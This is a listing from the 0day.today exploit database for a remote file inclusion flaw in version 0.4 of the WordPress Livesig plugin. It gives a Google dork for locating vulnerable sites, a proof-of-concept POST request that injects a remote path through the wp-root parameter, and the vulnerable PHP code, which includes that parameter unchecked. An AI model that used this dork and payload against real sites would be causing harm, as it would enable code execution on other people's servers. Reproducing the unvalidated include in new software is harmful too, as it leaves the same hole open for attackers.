[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress Livesig Plugin 0.4 Remote File Inclusion

Author
Ben Schmidt
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16945
Category
web applications
Date add
18-09-2011
Platform
php
# Exploit Title: Livesig Wordpress plugin RFI
# Google Dork: inurl:wp-content/plugins/livesig
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/livesig/download/
# Version: 0.4 (tested)
 
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/livesig/livesig-ajax-backend.php POST="wp-root=RFI&action=asdf"
 
---
Vulnerable Code
---
// Exit if no function specified
if( !isset( $_POST['action'] ) || '' == $_POST['action'] ) {
        echo '{ errcode: "ERR-000", errmsg: "No action specified" }';
        exit();
}
 
include( $_POST['wp-root'] . 'wp-config.php' );



#  0day.today [2024-12-24]  #